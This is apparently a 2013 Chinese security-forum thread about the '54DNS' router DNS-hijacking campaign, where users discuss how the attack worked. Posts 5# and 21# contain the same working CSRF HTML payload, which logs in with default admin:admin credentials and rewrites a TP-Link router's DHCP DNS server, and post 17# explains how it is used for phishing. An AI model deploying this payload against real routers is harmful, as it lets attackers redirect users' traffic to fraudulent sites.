54dns劫持实现dns钓鱼攻击威胁?
xsser (十根阳具有长短!!) | 2013-05-21 12:10
来自腾讯电脑管家的安全团队同步启动了针对此次DNS劫持攻击的数据监测,显示已至少有4%的全网用户受到感染。腾讯电脑管家安全专家、高级技术总监李旭阳表示,以全网2亿用户进行估算,每天至少有800万用户处于DNS钓鱼攻击威胁中,黑客可以随时发动针对网民的钓鱼欺诈攻击。
除DNS关联IP被篡改为钓鱼欺诈网址外,此次DNS劫持攻击的另一个典型特性是劫持流量巨大的导航站,诸如hao360.cn、hao123.com均未能幸免。腾讯副总裁曾宇表示,这种针对导航站的DNS劫持,主要以骗取流量为目的,在此前并不多见;比如用户打开的是hao123.com网站,实际上黑客已经劫持跳转到另外一个虚假的导航站页面,通过这种手段骗取大量用户点击,最终通过流量变现。这是典型的商业犯罪行为,具有明显的商业目的性。
http://guanjia.qq.com/news/n1/201305/17_173.html
大乌云起码超过100个人了,求一个样本分析下......
1#
猫头鹰 (啦啦啦啦啦啦啦啦啦啦啦啦啦啦啦啦啦啦啦啦啦啦啦啦啦) | 2013-05-21 12:11
我记得我大天朝的电信和联通dns劫持用户
2#
xsser (十根阳具有长短!!) | 2013-05-21 12:13
@猫头鹰 这个不是这个原理啊 哥
3#
missdiog | 2013-05-21 13:04
CSRF改家庭路由器的主DNS IP为攻击者的DNS服务器,然后自己的dns服务器想怎么解析就怎么解析。
4#
xsser (十根阳具有长短!!) | 2013-05-21 13:04
@missdiog 这是官方说辞啊 有木有实际的代码啊
5#
missdiog | 2013-05-21 13:11
@xsser
<script>
function dns(){
alert('I have changed your dns on my domain!')
i = new Image;
i.src='http://192.168.1.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=8.8.8.8&dnsserver2=0.0.0.0&Save=%B1%A3+%B4%E6';
}
</script>
<img src="http://admin:admin@192.168.1.1/images/logo.jpg" height=1 width=1 onload=dns()>
link:Http Authentication Url and csrf = Router Hacking, Csrf入侵内网路由器
6#
Rookie | 2013-05-21 13:14
官方说 受害用户面积很大.360导航也在其中..为什么没有其他的相关新闻啊..
7#
海盗湾V | 2013-05-21 13:26
方法五六年前就有了,没被重视,现在又被人利用了。路由器不用默认密码就没事。
相关资源
1. 史上最大规模“54DNS劫持”已得到有效遏制
http://www.itbear.com.cn/ZiXun/2013-05/81995.html
2. Http Authentication Url and csrf = Router Hacking !!!
http://hi.baidu.com/kpstfbahmmalqre/item/008121262c7802112b0f1c89
3. @ftofficer_张聪 在微博上推荐的Blended Threats and JavaScript: A Plan for Permanent Network Compromise 值得一看:
http://media.blackhat.com/bh-us-12/Briefings/Purviance/BH_US_12_Purviance_Blended_Threats_WP.pdf
http://l4.yunpan.cn/lk/Q5PA6rGSUPUmI
4. CSRF-苏醒的巨人
http://vdisk.weibo.com/s/meqNz
5. JavaScript安全从浏览器到服务端
http://vdisk.weibo.com/s/mernF
8#
xsser (十根阳具有长短!!) | 2013-05-21 14:04
@海盗湾V @Rookie @missdiog 你们说的都是理论上的技术讨论,我想看看实际中的攻击代码,或者攻击根本就没发生?
9#
Clouds | 2013-05-21 14:05
@xsser 哥……为毛不给我答复………
10#
淡漠天空 (路人的世界) | 2013-05-21 14:10
@xsser 已发生 已中枪
11#
xsser (十根阳具有长短!!) | 2013-05-21 14:12
@淡漠天空 详细说说 @Clouds 怎么了?
12#
Clouds | 2013-05-21 14:16
@xsser 我pm你很多次了…只想问问xsser的数据还在吗…?如果在可以把我的数据帮我拖下来一下吗…因为事先没有提示…我也没有备份…现在很需要里面一条数据…
13#
xsser (十根阳具有长短!!) | 2013-05-21 14:19
@Clouds 可以的,我们准备把那个代码和数据都提供下载的
14#
淡漠天空 (路人的世界) | 2013-05-21 14:20
@xsser 360导航劫持 自动跳转 不知道是不是这个
15#
疯狗 (谁淫荡啊谁淫荡) | 2013-05-21 14:21
@淡漠天空 快查查浏览记录,另外这个360的云应该有记录吧
16#
Clouds | 2013-05-21 14:21
@xsser 求准确时间……因为等了很多天了都是开源准备中…纠结啊…
17#
missdiog | 2013-05-21 14:27
@xsser code就是上面的啊,在页面上面挂类似上面的code,然后用户浏览后,CSRF更改路由器的DNS为恶意DNS,攻击者在恶意DNS上将某些域名解析到自己的网页。攻击完成。
重点就是csrf更改路由器的DNS服务器。没有什么高深的东西
18#
淡漠天空 (路人的世界) | 2013-05-21 14:37
url:http://an.moonbasa.com/transfer.aspx?cn=22569&type=0&adsiteid=10000007&url=http://www.moonbasa.com/?oid=5 早上一直是这个自动跳转
19#
_Evil (年轻人切忌浮躁,性趣是最好的导师.) | 2013-05-21 14:42
@疯狗 @xsser 两位wooyun高管。 看了看腾讯牛逼哄哄的说,原来是CSRF路由器欺骗DNS. 不过,攻击者整套攻击方法我很想晓得代码怎么样滴。嘎嘎。。。
20#
p.z (一回头 青春都喂了狗) | 2013-05-21 14:46
@xsser 华硕、TP-LINK等路由器遭黑客攻击
没事少听点摇滚民谣 多读书多看报
21#
蟋蟀哥哥 (popok是孙子!![just for fun]) | 2013-05-21 14:49
@_Evil CSRF直接修改掉路由器的DNS地址为自己的DNS IP,然后攻击者直接控制自己的DNS就可以了。
<script>
function dns(){
alert('I have changed your dns on my domain!')
i = new Image;
i.src='http://192.168.1.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=8.8.8.8&dnsserver2=0.0.0.0&Save=%B1%A3+%B4%E6';
}
</script>
<img src="http://admin:admin@192.168.1.1/images/logo.jpg" height=1 width=1 onload=dns()>
目测该code可行。
22#
xsser (十根阳具有长短!!) | 2013-05-21 15:01
@蟋蟀哥哥 @p.z 我找得到很多可行的办法,我要的不是证明这个东西的可行性,而是要真实情况里的代码,有谁能给出一个被证明的是54dns攻击的代码么,或者谁在网页里看到过这个攻击么??
23#
rayh4c (请不要叫我茄子。) | 2013-05-21 15:07
@xsser http://www.baidu.com/s?ie=utf-8&bs=66.102.253.51&f=8&rsv_bp=1&wd=66.102.253+8.8.8.8&rsv_sug3=2&rsv_sug=1&rsv_sug1=2&rsv_sug4=21&rsv_n=2&inputT=3964 能搜到些被攻击的人
24#
xsser (十根阳具有长短!!) | 2013-05-21 16:49
@rayh4c 收到... 也就2页啊
25#
bittertea (Bittertea.pw) | 2013-05-21 19:03
黑产也做得越来越有技术了。
26#
YKS (??????????????????????????????????????????????????????????????) | 2013-05-21 21:43
要是配合之前的百度贴吧XSS就屌炸天了。